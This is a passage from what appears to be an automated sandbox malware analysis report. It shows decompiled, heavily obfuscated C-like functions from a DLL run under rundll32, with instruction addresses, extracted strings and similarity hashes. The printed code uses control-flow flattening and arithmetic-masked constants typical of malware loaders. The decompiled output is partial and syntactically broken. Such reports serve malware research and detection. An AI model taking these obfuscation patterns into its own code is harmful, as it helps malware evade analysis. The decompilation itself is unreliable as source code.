								if(_t386 == 0) {
									_t433 = 0x399cbc9a;
									goto L29;
								} else {
									_t433 = 0x34bb9491;
									goto L13;
								}
							} else {
								_t364 = 0x2d7fc8f5;
								if(_t433 == 0x2d7fc8f5) {
									E1001ECE3( &_v4, _v96, _v104, _v152, _t438, _v124, _t395, _t395, _v116, _v32);
									_t433 =  !=  ? 0x1994d475 : 0x18ba6df;
									_t364 = E1001F23C(_v88, _v136, _v52, _v144, _v56);
									_t440 =  &(_t440[0xb]);
									L29:
									_t422 = 0x1994d475;
								} else {
									if(_t433 == 0x2fd49dd4) {
										return E100091CD(_v120, _v28, _v36, _t386, _v72);
									}
									if(_t433 == 0x34bb9491) {
										_push(_t395);
										_t438 = E100157E8(0x2000);
										_t433 =  !=  ? 0x2f8e7bf : 0x2fd49dd4;
										goto L13;
									}
								}
							}
							goto L30;
						}
					}
				}
			}

0x10006214
0x1000621b
0x10006222
0x10006229
0x10006230
0x10006231
0x10006232
0x10006237
0x10006242
0x1000624b
0x1000624d
0x10006252
0x10006256
0x1000625b
0x10006261
0x10006269
0x10006271
0x1000627c
0x10006283
0x1000628e
0x10006296
0x1000629b
0x100062a0
0x100062a5
0x100062ad
0x100062b5
0x100062bd
0x100062c2
0x100062ca
0x100062d2
0x100062e4
0x100062e9
0x100062f2
0x100062fd
0x10006305
0x1000630d
0x10006316
0x1000631b
0x10006321
0x10006329
0x10006331
0x10006339
0x10006341
0x10006349
0x10006351
0x10006359
0x10006361
0x10006369
0x10006371
0x10006379
0x1000637e
0x10006386
0x1000638e
0x100063a1
0x100063a2
0x100063a9
0x100063b4
0x100063c1
0x100063cb
0x100063cf
0x100063d9
0x100063e4
0x100063ef
0x100063fa
0x10006405
0x10006410
0x1000641b
0x1000642a
0x1000642d
0x10006434
0x1000643f
0x10006447
0x10006457
0x1000645b
0x10006463
0x1000646b
0x10006473
0x1000647b
0x10006483
0x1000648b
0x10006493
0x100064a0
0x100064a1
0x100064a5
0x100064ad
0x100064b5
0x100064ba
0x100064c2
0x100064ca
0x100064d2
0x100064df
0x100064e3
0x100064eb
0x100064f6
0x10006501
0x1000650c
0x10006514
0x10006521
0x10006525
0x1000652d
0x10006538
0x10006543
0x1000654e
0x10006556
0x1000655e
0x10006566
0x1000656b
0x10006573
0x1000657e
0x10006586
0x10006591
0x10006599
0x100065a1
0x100065a9
0x100065b1
0x100065be
0x100065c2
0x100065ca
0x100065d2
0x100065e6
0x100065ed
0x100065f8
0x10006600
0x10006608
0x10006610
0x10006618
0x10006620
0x10006628
0x10006632
0x1000663a
0x10006642
0x1000664a
0x10006652
0x10006661
0x10006662
0x10006666
0x1000666e
0x10006676
0x1000667e
0x10006686
0x1000668e
0x100066a2
0x100066a6
0x100066ad
0x100066b8
0x100066c3
0x100066ce
0x100066d9
0x100066e1
0x100066e9
0x100066ee
0x100066f6
0x100066fe
0x10006708
0x1000670c
0x10006714
0x1000671c
0x10006721
0x10006729
0x10006731
0x10006739
0x10006743
0x10006747
0x1000674f
0x10006756
0x10006756
0x10006756
0x1000675a
0x1000675a
0x1000675f
0x1000675f
0x1000675f
0x10006761
0x00000000
0x00000000
0x10006767
0x10006767
0x100068c3
0x100068c8
0x00000000
0x1000676d
0x10006773
0x10006897
0x1000689c
0x100068a4
0x00000000
0x10006779
0x1000677f
0x10006856
0x1000685b
0x10006860
0x100068cb
0x100068cb
0x00000000
0x10006862
0x1000686d
0x10006875
0x10006887
0x1000688b
0x1000688f
0x00000000
0x1000688f
0x100069fb
0x100069fb
0x10006785
0x1000678b
0x100067f6
0x100067fd
0x10006802
0x10006805
0x1000680a
0x1000680a
0x1000680e
0x1000680e
0x1000675a
0x00000000
0x1000678d
0x10006793
0x100067cc
0x100067ce
0x100067d3
0x100067e1
0x00000000
0x10006795
0x1000679b
0x100067a1
0x1000675f
0x1000675f
0x1000675f
0x10006761
0x00000000
0x00000000
0x00000000
0x10006761
0x00000000
0x1000675f
0x1000679b
0x10006793
0x1000678b
0x1000677f
0x10006773
0x100069bd
0x100069c3
0x100069c5
0x100069c9
0x00000000
0x100069c9
0x00000000
0x100068d5
0x100068db
0x10006997
0x1000699d
0x100069a2
0x100069a7
0x100069b3
0x00000000
0x100069a9
0x100069a9
0x00000000
0x100069a9
0x100068e1
0x100068e1
0x100068e8
0x10006951
0x1000697f
0x10006982
0x10006987
0x100069b8
0x100069b8
0x100068ea
0x100068f0
0x00000000
0x100069ee
0x100068fc
0x1000690a
0x10006915
0x10006924
0x00000000
0x10006924
0x100068fc
0x100068e8
0x00000000
0x100068db
0x1000675f
0x1000675a

Strings

Dmw, xrefs: 100067F6
rYym, xrefs: 100062CA
6B, xrefs: 10006371
?J, xrefs: 1000648B
F, xrefs: 1000667E
q$, xrefs: 10006599
RESCDIR, xrefs: 10006998
#, xrefs: 10006351

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$6B$?J$Dmw$RESCDIR$q$$rYym$F
API String ID: 0-1064706702
Opcode ID: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction ID: 12a8db86310814296b6cd3691f3c08f104cbabb9bff823363e51c79446ee3229
Opcode Fuzzy Hash: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
Instruction Fuzzy Hash: 531235729083809FE368CF24C985A4FBBE2FBC5754F108A1DE5D9962A0D7B59908CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002DEE, Relevance: 10.3, Strings: 8, Instructions: 299
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10002DEE(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				unsigned int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				intOrPtr _t312;
				intOrPtr _t315;
				signed int _t317;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				void* _t340;
				signed int _t376;
				void* _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int* _t385;

				_t385 =  &_v1676;
				_v1652 = 0xab2a;
				_v1652 = _v1652 + 0xffff495e;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 * 0x69;
				_t384 = __edx;
				_v1652 = _v1652 ^ 0xfed2f229;
				_v1584 = 0x9d53;
				_t328 = __ecx;
				_v1584 = _v1584 + 0xa330;
				_t377 = 0xee39a7c;
				_v1584 = _v1584 ^ 0x000172e7;
				_v1592 = 0xcdb9;
				_t330 = 0x11;
				_v1592 = _v1592 * 0x36;
				_v1592 = _v1592 ^ 0x002b5ef0;
				_v1576 = 0x10e6;
				_v1576 = _v1576 ^ 0xbdc8c8ad;
				_v1576 = _v1576 ^ 0xbdc8e062;
				_v1616 = 0x2d0;
				_v1616 = _v1616 << 2;
				_v1616 = _v1616 >> 4;
				_v1616 = _v1616 ^ 0x00001000;
				_v1564 = 0x56a7;
				_v1564 = _v1564 / _t330;
				_v1564 = _v1564 ^ 0x000075e6;
				_v1668 = 0x8a0a;
				_v1668 = _v1668 ^ 0xf9b8a5a3;
				_v1668 = _v1668 >> 4;
				_v1668 = _v1668 << 8;
				_v1668 = _v1668 ^ 0x9b82d072;
				_v1608 = 0x1b3c;
				_v1608 = _v1608 << 3;
				_t331 = 0x19;
				_v1608 = _v1608 * 0x7b;
				_v1608 = _v1608 ^ 0x006884bb;
				_v1660 = 0x34f3;
				_v1660 = _v1660 ^ 0x817c71db;
				_v1660 = _v1660 << 0xc;
				_v1660 = _v1660 + 0xee26;
				_v1660 = _v1660 ^ 0xc4532971;
				_v1636 = 0xf8a9;
				_v1636 = _v1636 | 0xff2fbebc;
				_v1636 = _v1636 * 9;
				_v1636 = _v1636 ^ 0xf8afb852;
				_v1620 = 0xbdfe;
				_v1620 = _v1620 / _t331;
				_v1620 = _v1620 + 0xcd35;
				_v1620 = _v1620 ^ 0x0000b0b7;
				_v1612 = 0xc643;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 + 0xffff2544;
				_v1612 = _v1612 ^ 0xffff1dfd;
				_v1596 = 0xa7ff;
				_v1596 = _v1596 + 0xffffdda0;
				_v1596 = _v1596 ^ 0x0000ce4c;
				_v1588 = 0x97f4;
				_v1588 = _v1588 >> 0xb;
				_v1588 = _v1588 ^ 0x00000d4c;
				_v1624 = 0xc45e;
				_t332 = 0x3c;
				_v1624 = _v1624 / _t332;
				_v1624 = _v1624 ^ 0xe4d01b6a;
				_v1624 = _v1624 ^ 0xe4d071e7;
				_v1628 = 0x92d6;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 | 0xb4e3a315;
				_v1628 = _v1628 ^ 0xb4e38f21;
				_v1676 = 0x6ce6;
				_t333 = 0x62;
				_v1676 = _v1676 / _t333;
				_t334 = 0x5b;
				_v1676 = _v1676 * 0xb;
				_v1676 = _v1676 + 0xffffdd0c;
				_v1676 = _v1676 ^ 0xffff8d43;
				_v1568 = 0x788f;
				_v1568 = _v1568 | 0x01d52ab2;
				_v1568 = _v1568 ^ 0x01d55070;
				_v1580 = 0xac01;
				_v1580 = _v1580 | 0x939dc85b;
				_v1580 = _v1580 ^ 0x939d96e7;
				_v1644 = 0x4f10;
				_v1644 = _v1644 * 0x6c;
				_v1644 = _v1644 | 0x48f07e2e;
				_v1644 = _v1644 >> 9;
				_v1644 = _v1644 ^ 0x00245a10;
				_v1656 = 0xfccd;
				_v1656 = _v1656 ^ 0x0dc9b737;
				_v1656 = _v1656 << 8;
				_v1656 = _v1656 | 0x5beff8b5;
				_v1656 = _v1656 ^ 0xdbefe6c8;
				_v1572 = 0x60e1;
				_v1572 = _v1572 / _t334;
				_v1572 = _v1572 ^ 0x000055cd;
				_v1604 = 0x4c8;
				_t335 = 0x33;
				_v1604 = _v1604 / _t335;
				_v1604 = _v1604 ^ 0x56d62181;
				_v1604 = _v1604 ^ 0x56d60377;
				_v1664 = 0xeba7;
				_t336 = 0x75;
				_v1664 = _v1664 / _t336;
				_v1664 = _v1664 + 0x2263;
				_t337 = 0x6a;
				_v1664 = _v1664 / _t337;
				_v1664 = _v1664 ^ 0x00006206;
				_v1672 = 0xe4de;
				_v1672 = _v1672 * 6;
				_v1672 = _v1672 ^ 0xd03d2876;
				_v1672 = _v1672 ^ 0x484383cd;
				_v1672 = _v1672 ^ 0x987bff54;
				_v1632 = 0x7003;
				_v1632 = _v1632 >> 0xf;
				_v1632 = _v1632 ^ 0x6ec815ff;
				_v1632 = _v1632 + 0xffffbce8;
				_v1632 = _v1632 ^ 0x6ec7acef;
				_v1640 = 0x9135;
				_v1640 = _v1640 ^ 0x0aba72c7;
				_v1640 = _v1640 | 0xda9e3ffa;
				_t338 = 7;
				_v1640 = _v1640 / _t338;
				_v1640 = _v1640 ^ 0x1f3ffeda;
				_v1648 = 0xbacf;
				_v1648 = _v1648 >> 0xd;
				_t339 = 0x17;
				_v1648 = _v1648 / _t339;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 ^ 0x0000584d;
				_v1600 = 0xeac1;
				_v1600 = _v1600 * 0x77;
				_v1600 = _v1600 ^ 0x006d5ca6;
				_t376 = _v1600;
				while(_t377 != 0x5fcbc3f) {
					if(_t377 != 0xee39a7c) {
						if(_t377 == 0x11ea9c68) {
							_push( &_v520);
							_t317 = E10002628(_t328, _t384);
							asm("sbb esi, esi");
							_t339 = 0x100012f8;
							_t380 =  ~_t317 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t377 == 0x1790ebe1) {
								return E100091CD(_v1632, _v1640, _v1648, _t376, _v1600);
							}
							_t394 = _t377 - 0x376b3a50;
							if(_t377 != 0x376b3a50) {
								L12:
								__eflags = _t377 - 0x7fc7711;
								if(_t377 != 0x7fc7711) {
									continue;
								} else {
									return _t317;
								}
								L16:
							} else {
								_push(_t339);
								E10001D54(_v1576, _t339, _v1616, _v1564, _v1668,  &_v1560, _v1608, _v1652);
								_push(0x10001368);
								_push(_v1620);
								E100163BF(E1001BF25(_v1660, _v1636, _t394), _t394, _v1596, _v1588,  &_v1040, _v1660, _v1624,  &_v1560,  &_v520, _v1628);
								E1001C5F7(_v1676, _v1568, _v1580, _v1644, _t321);
								_push(_v1672);
								_push(0);
								_push( &_v1040);
								_push(0);
								_push(_v1664);
								_push(_v1604);
								_push(0);
								_push(0);
								_t339 = _v1656;
								_t317 = E100189F6(_t339, _v1572, _t394);
								_t385 =  &(_t385[0x1d]);
								asm("sbb esi, esi");
								_t380 =  ~_t317 & 0xee6bd05e;
								L7:
								_t377 = _t380 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t340 = 0x24;
					_t315 = E100157E8(_t340);
					_t376 = _t315;
					_t339 = _t339;
					__eflags = _t376;
					if(_t376 != 0) {
						_t377 = 0x11ea9c68;
						continue;
					}
					return _t315;
					goto L16;
				}
				 *((intOrPtr*)(_t376 + 0x20)) = _t328;
				_t377 = 0x7fc7711;
				_t312 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t376 + 0x10)) = _t312;
				 *0x10021400 = _t376;
				goto L12;
			}

0x10002dee
0x10002df4
0x10002dfc
0x10002e04
0x10002e12
0x10002e16
0x10002e18
0x10002e22
0x10002e2a
0x10002e2c
0x10002e34
0x10002e39
0x10002e41
0x10002e50
0x10002e53
0x10002e57
0x10002e5f
0x10002e67
0x10002e6f
0x10002e77
0x10002e7f
0x10002e84
0x10002e89
0x10002e91
0x10002ea7
0x10002eae
0x10002eb9
0x10002ec1
0x10002ec9
0x10002ece
0x10002ed3
0x10002edb
0x10002ee3
0x10002eed
0x10002ef0
0x10002ef4
0x10002efc
0x10002f04
0x10002f0c
0x10002f11
0x10002f19
0x10002f21
0x10002f29
0x10002f36
0x10002f3a
0x10002f42
0x10002f52
0x10002f56
0x10002f5e
0x10002f66
0x10002f6e
0x10002f73
0x10002f7b
0x10002f83
0x10002f8b
0x10002f93
0x10002f9b
0x10002fa3
0x10002fa8
0x10002fb0
0x10002fbc
0x10002fbf
0x10002fc3
0x10002fcd
0x10002fd5
0x10002fdd
0x10002fe2
0x10002fea
0x10002ff2
0x10003000
0x10003005
0x10003010
0x10003013
0x10003017
0x1000301f
0x10003027
0x10003032
0x1000303d
0x10003048
0x10003050
0x10003058
0x10003060
0x1000306d
0x10003071
0x10003079
0x1000307e
0x10003086
0x1000308e
0x10003096
0x1000309b
0x100030a3
0x100030ab
0x100030bb
0x100030bf
0x100030c7
0x100030d3
0x100030d8
0x100030de
0x100030e6
0x100030ee
0x100030fa
0x100030ff
0x10003105
0x10003111
0x10003114
0x10003118
0x10003120
0x1000312d
0x10003131
0x10003139
0x10003141
0x10003149
0x10003151
0x10003156
0x1000315e
0x10003166
0x1000316e
0x10003176
0x1000317e
0x1000318e
0x10003193
0x10003199
0x100031a1
0x100031a9
0x100031b2
0x100031b5
0x100031b9
0x100031be
0x100031c6
0x100031d3
0x100031d7
0x100031df
0x100031e3
0x100031f5
0x10003201
0x1000330a
0x10003312
0x1000331c
0x1000331e
0x1000331f
0x00000000
0x10003207
0x1000320d
0x00000000
0x10003383
0x10003213
0x10003219
0x1000335f
0x1000335f
0x10003365
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000321f
0x1000321f
0x10003247
0x1000324c
0x10003251
0x10003299
0x100032b5
0x100032c6
0x100032ca
0x100032cb
0x100032cc
0x100032cd
0x100032d1
0x100032dc
0x100032dd
0x100032de
0x100032e2
0x100032e7
0x100032ee
0x100032f0
0x100032f6
0x100032f6
0x00000000
0x100032f6
0x10003219
0x10003201
0x10003332
0x10003333
0x10003338
0x1000333a
0x1000333b
0x1000333d
0x1000333f
0x00000000
0x1000333f
0x10003390
0x00000000
0x10003390
0x10003349
0x1000334c
0x10003351
0x10003356
0x10003359
0x00000000

Strings

c", xrefs: 10003105
&, xrefs: 10002F11
P:k7, xrefs: 10003213
u, xrefs: 10002EAE
MX, xrefs: 100031BE
l, xrefs: 10002FF2
L, xrefs: 10002FA8
`, xrefs: 100030AB

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$L$MX$P:k7$c"$`$l$u
API String ID: 0-1688440420
Opcode ID: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
Instruction ID: 244f6f35476485b824b653b9f0eb5f1c04093fde2945297bf2edbc57fc600e94
Opcode Fuzzy Hash: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
Instruction Fuzzy Hash: 4CE131725083409FE368CF25C98A94BFBF1FBC4748F10891DF5A58A260D7B69909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10001658, Relevance: 10.3, Strings: 8, Instructions: 285
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10001658(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t280;
				intOrPtr* _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				void* _t301;
				void* _t313;
				intOrPtr* _t337;
				void* _t338;
				void* _t341;
				signed int* _t342;

				_t342 =  &_v112;
				_v76 = 0x33fd;
				_v76 = _v76 + 0xc49f;
				_v76 = _v76 * 0x29;
				_t341 = __edx;
				_v76 = _v76 ^ 0x0027ed19;
				_v32 = 0xcc47;
				_t292 = __ecx;
				_t337 = 0;
				_t294 = 0x55;
				_v32 = _v32 / _t294;
				_v32 = _v32 ^ 0x00006db6;
				_t338 = 0x2fa674f5;
				_v72 = 0x6a0a;
				_v72 = _v72 + 0xffff61af;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0000c658;
				_v28 = 0xdc12;
				_v28 = _v28 + 0xffffa614;
				_v28 = _v28 ^ 0x0000bab7;
				_v64 = 0x618;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0xcf790140;
				_v64 = _v64 ^ 0xcf796a5a;
				_v108 = 0x7f72;
				_t295 = 0xe;
				_v108 = _v108 * 0x4b;
				_v108 = _v108 | 0xd60feb69;
				_v108 = _v108 ^ 0xd62f8cb3;
				_v112 = 0x24c;
				_v112 = _v112 / _t295;
				_v112 = _v112 | 0xf1ea6f15;
				_v112 = _v112 * 5;
				_v112 = _v112 ^ 0xb9941bfd;
				_v68 = 0xf170;
				_v68 = _v68 | 0xaf46648c;
				_v68 = _v68 ^ 0xc1ce5702;
				_v68 = _v68 ^ 0x6e88e0f6;
				_v20 = 0xb551;
				_v20 = _v20 * 0x25;
				_v20 = _v20 ^ 0x001a3386;
				_v24 = 0x298e;
				_v24 = _v24 * 0x76;
				_v24 = _v24 ^ 0x001331c5;
				_v60 = 0x8d97;
				_v60 = _v60 >> 2;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x0000628a;
				_v104 = 0x3b43;
				_v104 = _v104 >> 0xb;
				_v104 = _v104 + 0x60ed;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x060f18e7;
				_v56 = 0x22a0;
				_v56 = _v56 << 0xa;
				_v56 = _v56 | 0xb5955f6a;
				_v56 = _v56 ^ 0xb59ff508;
				_v96 = 0xc755;
				_v96 = _v96 + 0xffff502d;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x00007dd0;
				_v100 = 0xa33d;
				_t296 = 0x22;
				_v100 = _v100 / _t296;
				_t297 = 0x28;
				_v100 = _v100 * 0x21;
				_v100 = _v100 | 0xc89f00a3;
				_v100 = _v100 ^ 0xc89f9ef6;
				_v16 = 0x20c7;
				_v16 = _v16 + 0xecf3;
				_v16 = _v16 ^ 0x00014c0a;
				_v40 = 0x76db;
				_v40 = _v40 >> 9;
				_v40 = _v40 + 0x6d1d;
				_v40 = _v40 ^ 0x000061d8;
				_v44 = 0x71d;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 + 0xff5b;
				_v44 = _v44 ^ 0x0000e72e;
				_v48 = 0x8b38;
				_v48 = _v48 ^ 0xf66aca43;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x905ecaad;
				_v12 = 0xfda7;
				_v12 = _v12 ^ 0xcb86e1f3;
				_v12 = _v12 ^ 0xcb86358a;
				_v52 = 0x79a1;
				_v52 = _v52 | 0x05e61714;
				_v52 = _v52 * 0x59;
				_v52 = _v52 ^ 0x0d220a4b;
				_v92 = 0x6d1;
				_v92 = _v92 ^ 0xaab1ecb0;
				_v92 = _v92 ^ 0x7a5f7ff4;
				_v92 = _v92 | 0x9dbc7c28;
				_v92 = _v92 ^ 0xddfeba29;
				_v4 = 0xb969;
				_v4 = _v4 + 0xffff29a6;
				_v4 = _v4 ^ 0xffffac55;
				_v8 = 0x80c1;
				_v8 = _v8 / _t297;
				_v8 = _v8 ^ 0x00007b2b;
				_v80 = 0x88c7;
				_t298 = 0x72;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x43e442c5;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x087de60e;
				_v84 = 0xaa5;
				_v84 = _v84 * 0x44;
				_v84 = _v84 / _t298;
				_t299 = 0x68;
				_v84 = _v84 / _t299;
				_v84 = _v84 ^ 0x00006b9b;
				_v88 = 0x4374;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0x8882;
				_t300 = 0x1f;
				_v88 = _v88 / _t300;
				_v88 = _v88 ^ 0x00003aab;
				_v36 = 0xe64;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 ^ 0x5e386e4c;
				_v36 = _v36 ^ 0x5e3850f6;
				while(1) {
					L1:
					_t280 = 0x220f80b2;
					while(1) {
						L2:
						_t301 = 0x34935044;
						do {
							L3:
							while(_t338 != 0x12347269) {
								if(_t338 == _t280) {
									_t282 = E1000D6D8(_v40, _v44, _t301, E1000213E, _v48, _t301, _t337, _t301, _t301, _v12, _v52);
									_t342 =  &(_t342[9]);
									 *((intOrPtr*)(_t337 + 4)) = _t282;
									__eflags = _t282;
									_t301 = 0x34935044;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x34935044 : 0x12347269;
									continue;
								}
								if(_t338 == 0x269b78c0) {
									_t283 = E10008997(_v56, _v96, _v100, _v16,  *_t337);
									_t342 =  &(_t342[3]);
									 *((intOrPtr*)(_t337 + 0x1c)) = _t283;
									__eflags = _t283;
									_t280 = 0x220f80b2;
									_t338 =  !=  ? 0x220f80b2 : 0x12347269;
									L2:
									_t301 = 0x34935044;
									continue;
								}
								if(_t338 == 0x29978df7) {
									_push(_v28);
									_t284 = E10005BE1(_v72, _t341, __eflags, _t301);
									 *_t337 = _t284;
									__eflags = _t284;
									if(__eflags == 0) {
										_t338 = 0x2b89b2cd;
									} else {
										E100039D1(_v108, _v112,  *_t337, _v68, _t284);
										E100056B3(_v24, _v60,  *_t337, _v104);
										_t342 =  &(_t342[7]);
										_t338 = 0x269b78c0;
									}
									while(1) {
										L1:
										_t280 = 0x220f80b2;
										goto L2;
									}
								}
								if(_t338 == 0x2b89b2cd) {
									return E100091CD(_v80, _v84, _v88, _t337, _v36);
								}
								if(_t338 == 0x2fa674f5) {
									_push(_t301);
									_t313 = 0x24;
									_t290 = E100157E8(_t313);
									_t337 = _t290;
									__eflags = _t337;
									if(__eflags == 0) {
										return _t290;
									}
									_t338 = 0x29978df7;
									goto L1;
								}
								if(_t338 != _t301) {
									goto L19;
								}
								 *((intOrPtr*)(_t337 + 0x20)) = _t292;
								_t291 =  *0x10021400; // 0x0
								 *((intOrPtr*)(_t337 + 0x10)) = _t291;
								 *0x10021400 = _t337;
								return _t291;
							}
							E10018C8B(_v92, _v4, _v8,  *_t337);
							_t338 = 0x2b89b2cd;
							_t280 = 0x220f80b2;
							_t301 = 0x34935044;
							L19:
							__eflags = _t338 - 0x92c1d44;
						} while (__eflags != 0);
						return _t280;
					}
				}
			}

0x10001658
0x1000165b
0x10001663
0x10001674
0x10001678
0x1000167a
0x10001684
0x1000168c
0x10001692
0x10001696
0x1000169b
0x100016a1
0x100016a9
0x100016ae
0x100016b6
0x100016be
0x100016c3
0x100016cb
0x100016d3
0x100016db
0x100016e3
0x100016eb
0x100016f0
0x100016f8
0x10001700
0x1000170d
0x1000170e
0x10001712
0x1000171a
0x10001722
0x10001730
0x10001734
0x10001741
0x10001745
0x1000174d
0x10001755
0x1000175d
0x10001765
0x1000176d
0x1000177a
0x1000177e
0x10001786
0x10001793
0x10001797
0x1000179f
0x100017a7
0x100017ac
0x100017b1
0x100017b9
0x100017c1
0x100017c6
0x100017ce
0x100017d3
0x100017db
0x100017e3
0x100017e8
0x100017f0
0x100017f8
0x10001800
0x10001808
0x1000180d
0x10001812
0x1000181c
0x1000182a
0x1000182f
0x1000183a
0x1000183d
0x10001841
0x10001849
0x10001851
0x10001859
0x10001861
0x10001869
0x10001871
0x10001876
0x1000187e
0x10001886
0x1000188e
0x10001893
0x1000189b
0x100018a3
0x100018ab
0x100018b3
0x100018b8
0x100018c0
0x100018c8
0x100018d0
0x100018d8
0x100018e0
0x100018ed
0x100018f1
0x100018f9
0x10001901
0x10001909
0x10001911
0x10001919
0x10001921
0x1000192c
0x10001937
0x10001942
0x10001952
0x10001956
0x1000195e
0x1000196b
0x1000196e
0x10001972
0x1000197a
0x1000197f
0x10001987
0x10001994
0x100019a0
0x100019a8
0x100019ad
0x100019b3
0x100019bb
0x100019c3
0x100019c7
0x100019d3
0x100019d6
0x100019da
0x100019e2
0x100019ea
0x100019ef
0x100019f7
0x100019ff
0x100019ff
0x100019ff
0x10001a04
0x10001a04
0x10001a04
0x10001a09
0x00000000
0x10001a09
0x10001a17
0x10001b3c
0x10001b41
0x10001b44
0x10001b47
0x10001b4e
0x10001b53
0x10001b58
0x00000000
0x10001b58
0x10001a23
0x10001aff
0x10001b04
0x10001b07
0x10001b0a
0x10001b11
0x10001b16
0x10001a04
0x10001a04
0x00000000
0x10001a04
0x10001a2f
0x10001a89
0x10001a94
0x10001a99
0x10001a9d
0x10001a9f
0x10001ae3
0x10001aa1
0x10001ab4
0x10001ad1
0x10001ad6
0x10001ad9
0x10001ad9
0x100019ff
0x100019ff
0x100019ff
0x00000000
0x100019ff
0x100019ff
0x10001a37
0x00000000
0x10001bab
0x10001a43
0x10001a6b
0x10001a6e
0x10001a6f
0x10001a74
0x10001a77
0x10001a79
0x10001bb5
0x10001bb5
0x10001a7f
0x00000000
0x10001a7f
0x10001a47
0x00000000
0x00000000
0x10001a4d
0x10001a50
0x10001a55
0x10001a58
0x00000000
0x10001a58
0x10001b71
0x10001b78
0x10001b7d
0x10001b82
0x10001b87
0x10001b87
0x10001b87
0x00000000
0x10001a09
0x10001a04

Strings

`, xrefs: 100017C6
j, xrefs: 100016AE
Ln8^, xrefs: 100019EF
+{, xrefs: 10001956
tC, xrefs: 100019BB
K", xrefs: 100018F1
., xrefs: 1000189B
K", xrefs: 100018E8

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$+{$.$K"$K"$Ln8^$tC$`
API String ID: 0-3859911108
Opcode ID: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
Instruction ID: 31beb1e1d2509969b8c97709e2d0e8827b8fffe3f774f18c97f02cb453e1c763
Opcode Fuzzy Hash: 6b84709b704d0638800b18a7bc033e277d2e13a58470b41357cbc58c38864029
Instruction Fuzzy Hash: D9D142715083819FE398CF25C48A40BFBE1FBC4788F108A1EF5999A2A4D7B5D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1001D530, Relevance: 10.3, Strings: 8, Instructions: 271
COMMONCrypto

